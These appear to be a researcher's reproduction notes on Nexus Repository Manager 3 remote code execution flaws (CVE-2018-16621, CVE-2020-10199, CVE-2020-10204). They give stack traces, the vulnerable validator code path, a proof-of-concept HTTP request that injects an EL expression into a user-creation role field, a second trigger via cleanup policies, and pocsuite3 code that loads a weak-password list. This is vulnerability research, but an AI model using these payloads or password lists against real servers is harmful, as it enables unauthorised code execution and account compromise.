Skipping the XSS.
RCE:
an attacker with any type of account on NXRM to execute arbitrary code by crafting a malicious request to NXRM
http://download.sonatype.com/nexus/3/nexus-3.21.1-01-unix.tar.gz
http://download.sonatype.com/nexus/3/nexus-3.21.2-03-unix.tar.gz
getValue:193, ValueExpressionImpl (com.sun.el)
interpolate:67, ElTermResolver (org.hibernate.validator.internal.engine.messageinterpolation)
interpolate:64, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolate:112, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolateExpression:451, AbstractMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolateMessage:347, AbstractMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:286, AbstractMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:313, AbstractValidationContext (org.hibernate.validator.internal.engine.validationcontext)
addConstraintFailure:230, AbstractValidationContext (org.hibernate.validator.internal.engine.validationcontext)
validateConstraints:79, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
doValidateConstraint:130, MetaConstraint (org.hibernate.validator.internal.metadata.core)
validateConstraint:123, MetaConstraint (org.hibernate.validator.internal.metadata.core)
validateMetaConstraint:555, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForSingleDefaultGroupElement:518, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForDefaultGroup:488, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForCurrentGroup:450, ValidatorImpl (org.hibernate.validator.internal.engine)
validateInContext:400, ValidatorImpl (org.hibernate.validator.internal.engine)
validate:172, ValidatorImpl (org.hibernate.validator.internal.engine)
createViolation:64, ConstraintViolationFactory (org.sonatype.nexus.validation)
validateGroupMembers:96, AbstractGroupRepositoriesApiResource (org.sonatype.nexus.repository.rest.api)
createRepository:66, AbstractGroupRepositoriesApiResource (org.sonatype.nexus.repository.rest.api)
createRepository:74, BowerGroupRepositoriesApiResource (org.sonatype.nexus.repository.bower.rest)
CGLIB$createRepository$1:-1, BowerGroupRepositoriesApiResource$$EnhancerByGuice$$da7a5161 (org.sonatype.nexus.repository.bower.rest)
invoke:-1, BowerGroupRepositoriesApiResource$$EnhancerByGuice$$da7a5161$$FastClassByGuice$$b07abeb1 (org.sonatype.nexus.repository.bower.rest)
invokeSuper:228, $MethodProxy (com.google.inject.internal.cglib.proxy)
proceed:76, InterceptorStackCallback$InterceptedMethodInvocation (com.google.inject.internal)
invoke:53, ValidationInterceptor (org.sonatype.nexus.validation.internal)
proceed:77, InterceptorStackCallback$InterceptedMethodInvocation (com.google.inject.internal)
proceed:49, AopAllianceMethodInvocationAdapter (org.apache.shiro.guice.aop)
invoke:68, AuthorizingAnnotationMethodInterceptor (org.apache.shiro.authz.aop)
invoke:36, AopAllianceMethodInterceptorAdapter (org.apache.shiro.guice.aop)
proceed:77, InterceptorStackCallback$InterceptedMethodInvocation (com.google.inject.internal)
intercept:55, InterceptorStackCallback (com.google.inject.internal)
createRepository:-1, BowerGroupRepositoriesApiResource$$EnhancerByGuice$$da7a5161 (org.sonatype.nexus.repository.bower.rest)
invoke:-1, GeneratedMethodAccessor275 (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invoke:140, MethodInjectorImpl (org.jboss.resteasy.core)
invokeOnTarget:294, ResourceMethodInvoker (org.jboss.resteasy.core)
invoke:248, ResourceMethodInvoker (org.jboss.resteasy.core)
invoke:235, ResourceMethodInvoker (org.jboss.resteasy.core)
invoke:402, SynchronousDispatcher (org.jboss.resteasy.core)
invoke:209, SynchronousDispatcher (org.jboss.resteasy.core)
service:227, ServletContainerDispatcher (org.jboss.resteasy.plugins.server.servlet)
service:56, HttpServletDispatcher (org.jboss.resteasy.plugins.server.servlet)
service:51, HttpServletDispatcher (org.jboss.resteasy.plugins.server.servlet)
service:109, ComponentContainerImpl (org.sonatype.nexus.siesta.internal.resteasy)
service:137, SiestaServlet (org.sonatype.nexus.siesta)
...
Official vulnerability description:
The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM.
Reference:
https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
Presumably a bypass of CVE-2018-16621.
Reproduced successfully on Mac.
Another spot that needs an administrator to trigger it: create a cleanup_CleanupPolicy with the payload in its format field, then, as a second step, call one of the endpoints that can reference a cleanupPolicy, e.g. /service/rest/beta/repositories/apt/hosted, and specify the policy name:
"cleanup": {
"policyNames": ["myPolicyName"]
}
which triggers the EL expression.
Reference: https://github.com/threedr3am/learnjavabug/blob/master/nexus/CVE-2020-10199/README.md
Reference: https://github.com/Cryin/Paper/blob/master/CVE-2018-16621%20Nexus%20Repository%20Manager3%20%E4%BB%BB%E6%84%8FEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5.md
PoC:
POST /service/extdirect HTTP/1.1
Host: 192.168.85.129:8081
Content-Type: application/json
Connection: close
Cookie: fusionauth.locale=zh_CN; remember-me=YWRtaW46MTU4NjQyMDcwNTI5ODo5ZmJhMGViMDFjYjM2MmEzNGU5YWQ2MTExYTYwZWNjNQ; JSESSIONID=FD1D448F8785A262DC6453B773955371; username="FS1YvSKKiX8_"; password="FS1YvSKKiX8_"; rememberme="false"; validation="8ab366e87f98368ce07c2c89f9064073"; XSRF-TOKEN=46b5a232-f694-4e27-930d-9e0163f5e310; NXSESSIONID=e5682534-b930-4491-ab86-aa02e5f32a12
Content-Length: 218
{"action":"coreui_User","method":"create","data":[{"userId":"test123","firstName":"77","lastName":"cai","password":"password","email":"[email protected]","status":"active","roles":["nx-admin${7776+1}"]}],"type":"rpc","tid":49}
When a role name in the request does not exist, it is added to missing:
nexus-3.13.0-01\system\org\sonatype\nexus\nexus-security\3.13.0-01\nexus-security-3.13.0-01.jar!\org\sonatype\nexus\security\role\RolesExistValidator#isValid
try {
    this.authorizationManager.getRole(String.valueOf(item));
} catch (NoSuchRoleException var6) {
    missing.add(item);
}
Finally it traces down to here:
nexus-3.13.0-01\system\org\hibernate\hibernate-validator\5.1.2.Final\hibernate-validator-5.1.2.Final.jar!\org\hibernate\validator\internal\engine\messageinterpolation\InterpolationTerm#interpolateExpressionLanguageTerm
interpolateExpressionLanguageTerm:112, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolate:90, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolateExpression:342, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolateMessage:298, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:182, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:362, ValidationContext (org.hibernate.validator.internal.engine)
createConstraintViolation:271, ValidationContext (org.hibernate.validator.internal.engine)
createConstraintViolations:232, ValidationContext (org.hibernate.validator.internal.engine)
validateSingleConstraint:291, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraints:133, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraints:91, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraint:83, MetaConstraint (org.hibernate.validator.internal.metadata.core)
validateConstraint:547, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForNonDefaultGroup:511, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForCurrentGroup:448, ValidatorImpl (org.hibernate.validator.internal.engine)
validateInContext:403, ValidatorImpl (org.hibernate.validator.internal.engine)
validateCascadedConstraint:723, ValidatorImpl (org.hibernate.validator.internal.engine)
validateCascadedConstraints:601, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParametersInContext:992, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:300, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:254, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:65, ValidationInterceptor (org.sonatype.nexus.validation.internal)
invoke:51, ValidationInterceptor (org.sonatype.nexus.validation.internal)
Nexus has many permissions, and they are fine-grained:
CVE-2018-16621: An attacker with administrative privileges
CVE-2020-10199: an attacker with any type of account on NXRM (in my testing at least the repository-admin-*-*-add privilege is required; reportedly there is an unauthenticated RCE in some range of versions ("a window of versions"), but I could not reproduce it)
CVE-2020-10204: an attacker with an administrative account on NXRM (in my testing at least this privilege is required: nx-users-create)
References:
CVE-2018-16621
CVE-2020-10199
CVE-2020-10204
Historical version downloads:
https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3
On Windows, it threw this error:
javax.el.ELException: java.lang.IllegalArgumentException: object is not an instance of declaring class
Reference:
https://stackoverflow.com/questions/53021763/cannot-open-local-storage-nexus3-db-config-with-mode-rw-db-name-config
Moved nexus to a different directory; it may have been conflicting with the OrientDB under the sonatype-work directory of the previously started nexus.
You can use the dictionary bundled with pocsuite:
# To get password-top100.txt from pocsuite3's bundled data directory
from pocsuite3.lib.core.data import paths

# Method on a pocsuite3 POC class; paths.WEAK_PASS points at password-top100.txt
def get_password_dict(self):
    pwddict = []
    with open(paths.WEAK_PASS) as f:
        for item in f:
            item = item.strip()
            if item:                # skip blank lines
                pwddict.append(item)
    return pwddict